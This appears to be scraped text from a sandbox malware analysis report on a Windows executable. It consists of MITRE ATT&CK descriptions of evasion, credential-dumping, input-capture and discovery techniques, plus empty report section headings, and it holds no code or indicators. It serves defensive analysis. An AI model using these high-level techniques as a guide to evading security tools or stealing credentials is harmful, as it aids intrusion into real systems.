Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Xjf4yH9N2t.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre